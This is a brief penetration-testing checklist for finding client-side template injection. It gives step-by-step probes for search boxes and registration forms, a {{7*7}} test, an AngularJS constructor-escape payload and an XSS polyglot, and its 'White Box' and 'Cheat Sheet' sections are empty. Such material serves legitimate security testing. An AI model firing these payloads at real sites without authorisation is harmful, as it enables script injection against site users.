Client Side Template Injection

Check List

Methodology

Black Box

Search Box

1

Go to any search box on the target

2

Enter this exact payload in the input field

{{7*7}}

3

Submit the form or trigger the search

4

Check the response or rendered page

5

If you see 49, Client-Side Template Injection (CSTI) CONFIRMED

6

Escalate immediately with this XSS payload

{{constructor.constructor('alert(document.domain)')()}}

7

If alert pops, Full XSS via CSTI, CONFIRMED

of

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert(document.domain)//>

---

CSTI in the registration process

1

Log in to the target site and complete the account creation process

2

Then trace the request process using Burp Suite

3

In the intercepted request from the account creation process, replace and fill in the username form using the payload below and submit the request

“>{{7*7}}<img>

4

After creating the account, if the username field contains 49, the vulnerability is confirmed

5

Then we can convert this vulnerability to XSS using the following command

{{constructor.constructor(‘alert(`XSS`)’)()}}

---

White Box

Cheat Sheet